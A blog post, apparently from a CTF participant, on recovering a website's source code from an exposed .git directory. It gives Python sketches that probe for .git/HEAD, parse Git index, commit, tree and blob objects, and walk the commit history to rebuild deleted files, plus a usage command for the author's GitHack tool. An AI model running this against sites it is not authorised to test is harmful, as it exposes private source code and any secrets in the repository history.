A New GitHack Script

A Git hack becomes possible when site maintainers use Git to manage a website's source code but forget to delete the .git directory before deploying. By accessing http://your.target.site/.git/, you can easily find Git metadata and even recover the source code of the target website. You may get a 403 when visiting that URL, but that usually only means directory listing is restricted. In that case, you can still download individual files if you know their exact URLs.
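
To make the 403 case concrete, here is a minimal sketch of how one might probe a target by requesting a known file instead of the directory. The function names `looks_like_head` and `git_exposed` are my own for illustration and are not taken from any existing GitHack script. It assumes the server returns the raw contents of .git/HEAD when the directory is exposed.

```python
from urllib.error import URLError
from urllib.parse import urljoin
from urllib.request import urlopen


def looks_like_head(content: bytes) -> bool:
    """HEAD holds either 'ref: <path>' or a raw 40-character commit hash."""
    text = content.decode("ascii", "replace").strip()
    if text.startswith("ref: "):
        return True
    return len(text) == 40 and all(c in "0123456789abcdef" for c in text)


def git_exposed(base_url: str, timeout: float = 10.0) -> bool:
    """Fetch <base_url>/HEAD directly; a 403 on the directory itself does not matter."""
    if not base_url.endswith("/"):
        base_url += "/"
    try:
        with urlopen(urljoin(base_url, "HEAD"), timeout=timeout) as resp:
            return looks_like_head(resp.read(256))
    except (URLError, OSError):
        # Covers HTTP errors (403/404), DNS failures and timeouts.
        return False
```

Calling `git_exposed("http://your.target.site/.git/")` would then tell you whether it is worth going further. Only run this against targets you are allowed to test.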

Why I wrote this script

Recently I took part in a CTF hosted by Wuhan University. One of the web challenges was about a Git hack.

When I tried to solve that challenge with a widely used GitHack script, which was supposed to download the source code, no files were downloaded, even though all of the .git files were listed on the page. I quickly analyzed the script and found the reason.

That script works as follows:

  1. Retrieve the index file and extract file names and SHA1;
  2. Download the files with the SHA1;
  3. Save the downloaded files into organized directories.

Everything seems perfect. However, a fatal problem can occur in step 1: if there are no files in the current repository, the index will contain no entries! The script then finds nothing to download, even though earlier commits may still hold the files.

The index is a single, large, binary file in <baseOfRepo>/.git/index, which lists all files in the current branch, their sha1 checksums, time stamps and the file name — it is not another directory with a copy of files in it. [1]
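
To illustrate why an index-based approach comes back empty-handed, here is a rough sketch of reading the entry list from an index file. It is my own simplified reading of the index format, not the code of the script I was using: `parse_index` is a hypothetical name, it only handles index version 2, and it ignores extensions and very long paths.

```python
import struct


def parse_index(data: bytes):
    """Return (path, sha1_hex) for each entry of a version-2 Git index."""
    signature, version, count = struct.unpack(">4sII", data[:12])
    if signature != b"DIRC":
        raise ValueError("not a Git index file")
    if version != 2:
        raise ValueError("this sketch only handles index version 2")
    entries = []
    offset = 12
    for _ in range(count):
        # 40 bytes of stat data precede the 20-byte SHA-1 and the 2-byte flags.
        sha1_hex = data[offset + 40:offset + 60].hex()
        (flags,) = struct.unpack(">H", data[offset + 60:offset + 62])
        name_len = flags & 0x0FFF  # low 12 bits hold the path length
        path = data[offset + 62:offset + 62 + name_len].decode("utf-8", "replace")
        entries.append((path, sha1_hex))
        # Each entry is NUL-padded to a multiple of 8 bytes.
        offset += (62 + name_len + 8) // 8 * 8
    return entries
```

When the entry count in the header is 0, the loop never runs and the result is an empty list, so there are no file names or hashes to download.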

After realizing this problem, I decided to write a new script that uses a different method.

How my script works

First off, we need to know which parts of the .git directory are needed to restore files.

HEAD                              # HEAD pointer ref
refs
    \_ heads
           \_ master              # real pointer to the newest commit
objects
    \_ *                          # all files compressed with zlib
  • HEAD: a reference to the branch pointer. (ref: refs/heads/master)
  • refs/heads/master: the real pointer, i.e. the hash of the newest commit. (f43003bce4f11d9b2532b5fac0a0006126f14e2a)
  • objects: the object with a given hash is stored here at ./hash[0:2]/hash[2:]. Objects are compressed with zlib.
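
The three items above translate into a few lines of Python. This is only a sketch with helper names I made up (`resolve_head`, `object_path`, `decode_object`), and it assumes the objects are stored as loose files; objects that Git has moved into packfiles cannot be found this way.

```python
import zlib


def resolve_head(head_text: str):
    """Return the ref path HEAD points at, or None if HEAD holds a raw hash."""
    head_text = head_text.strip()
    if head_text.startswith("ref: "):
        return head_text[len("ref: "):]
    return None


def object_path(sha1_hex: str) -> str:
    """Map a hash to its location relative to the .git directory."""
    return "objects/{}/{}".format(sha1_hex[:2], sha1_hex[2:])


def decode_object(compressed: bytes):
    """Decompress a loose object and split it into (type, size, body)."""
    raw = zlib.decompress(compressed)
    header, _, body = raw.partition(b"\x00")
    kind, _, size = header.partition(b" ")
    return kind.decode("ascii"), int(size), body
```

For the hash shown above, `object_path` gives objects/f4/3003bce4f11d9b2532b5fac0a0006126f14e2a, which is the path to append to the .git URL.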

Secondly, three types of objects in the objects directory are relevant here.

Commit

It holds the Git log information along with the hashes of the tree node and the parent commit. An example is shown below.

commit: 
    b'commit 210\x00tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904 
    parent 912133f7bd228e96757a531ef52d1777de10ca8a 
    author Alice <xxx@qq.com> 1554748133 +0800 
    committer Alice <xxx@qq.com> 1554748133 +0800
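
Pulling the tree and parent hashes out of such an object is mostly string splitting. The sketch below uses a hypothetical `parse_commit` helper and assumes it receives the part after the `commit <size>\x00` header. A commit can have no parent (the first commit) or several (a merge), so the parents come back as a list.

```python
def parse_commit(body: bytes):
    """Return (tree_hash, [parent_hashes]) from a decompressed commit body."""
    # Header lines end at the first blank line; the commit message follows.
    headers = body.split(b"\n\n", 1)[0].decode("utf-8", "replace")
    tree, parents = None, []
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        if key == "tree":
            tree = value.strip()
        elif key == "parent":
            parents.append(value.strip())
    return tree, parents
```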

Tree

It describes the directory structure. Each entry of a tree node can be either a blob or another tree. The entries in a tree contain filenames and the hashes of their blobs or subtrees. The diagram in [2] illustrates the structure. An example is provided below.

tree: 
  b'tree 0\x00'
# or 
  b"tree 32\x00100644 flag\x00'0\xedavmI\x048\xad\x80\xe0\x7f\xec\x85|\x83\xfbB\xb3"
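
The tree body is binary, so it has to be walked entry by entry: an ASCII mode, a space, the file name, a NUL byte, then the 20 raw bytes of the hash. Below is a small sketch of that loop; `parse_tree` is a name I picked for illustration, and it expects the part after the `tree <size>\x00` header. Note that the first example above, `tree 0`, is the empty tree, whose hash is 4b825dc642cb6eb9a060e54bf8d69288fbee4904, the same tree the commit example points to.

```python
def parse_tree(body: bytes):
    """Return a list of (mode, name, sha1_hex) from a decompressed tree body."""
    entries = []
    pos = 0
    while pos < len(body):
        space = body.index(b" ", pos)      # end of the mode, e.g. 100644 or 40000
        nul = body.index(b"\x00", space)   # end of the file name
        mode = body[pos:space].decode("ascii")
        name = body[space + 1:nul].decode("utf-8", "replace")
        sha1_hex = body[nul + 1:nul + 21].hex()  # 20 raw bytes, not hex text
        entries.append((mode, name, sha1_hex))
        pos = nul + 21
    return entries
```

Applied to the second example, this yields one entry: mode 100644, name flag, hash 2730ed61766d490438ad80e07fec857c83fb42b3. An entry with mode 40000 points to another tree instead of a blob.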

Blob

It holds the content of a single file. An example:

blob: 
    b'blob 37\x00WHUCTF{xxxxxxxxxxxxxxxxxxxxxxxx}\n'

My script first retrieves the newest commit hash from refs/heads/master, then recursively walks through all commits via their parent hashes. For each commit, the script locates the tree, parses it, then finds the blobs and extracts them. Finally, all files are saved into organized directories.
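
The walk described above can be sketched roughly as follows. This is not the code from my repository, only an illustration of the idea: `fetch` is a hypothetical callable that takes a hash and returns the decompressed object bytes (header included), and the result is kept in memory as a dict instead of being written to directories. Submodule entries (mode 160000) are skipped because their hashes point into another repository.

```python
def split_object(raw: bytes):
    """Split a decompressed object into (type, body)."""
    header, _, body = raw.partition(b"\x00")
    return header.split(b" ")[0].decode("ascii"), body


def walk_tree(fetch, tree_sha, prefix, files):
    """Collect {path: content} for every blob reachable from a tree."""
    _, body = split_object(fetch(tree_sha))
    pos = 0
    while pos < len(body):
        space = body.index(b" ", pos)
        nul = body.index(b"\x00", space)
        mode = body[pos:space]
        path = prefix + body[space + 1:nul].decode("utf-8", "replace")
        sha = body[nul + 1:nul + 21].hex()
        pos = nul + 21
        if mode == b"40000":        # subdirectory: recurse into the subtree
            walk_tree(fetch, sha, path + "/", files)
        elif mode != b"160000":     # regular file or symlink: store the blob
            files[path] = split_object(fetch(sha))[1]


def walk_commits(fetch, commit_sha, snapshots=None):
    """Return {commit_hash: {path: content}} for a commit and all its ancestors."""
    if snapshots is None:
        snapshots = {}
    if commit_sha in snapshots:     # already visited (e.g. via a merge)
        return snapshots
    _, body = split_object(fetch(commit_sha))
    headers = body.split(b"\n\n", 1)[0].decode("utf-8", "replace")
    files = snapshots[commit_sha] = {}
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        if key == "tree":
            walk_tree(fetch, value.strip(), "", files)
        elif key == "parent":
            walk_commits(fetch, value.strip(), snapshots)
    return snapshots
```

Because every commit is visited, a file that was deleted in the newest commit still shows up in the snapshot of an older one, which is exactly what the index-based approach misses. For a very long history, plain recursion could hit Python's recursion limit, so an explicit stack may be the safer choice there.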

Script

The script downloads the files without requiring Git to be installed.

Project: https://github.com/hazzel-cn/GitHack

Usage:

git clone https://github.com/hazzel-cn/GitHack.git 
cd GitHack 
python3 githack.py http://your.target.site/.git/

Screenshot

[Screenshot: githack.py]

[Screenshot: gitclone.py]

Reference

  • [1] https://stackoverflow.com/questions/3689838/whats-the-difference-between-head-working-tree-and-index-in-git/3690796
  • [2] https://www.jianshu.com/p/8659c9ae00cb
  • [3] https://www.jianshu.com/p/6d93d6153070
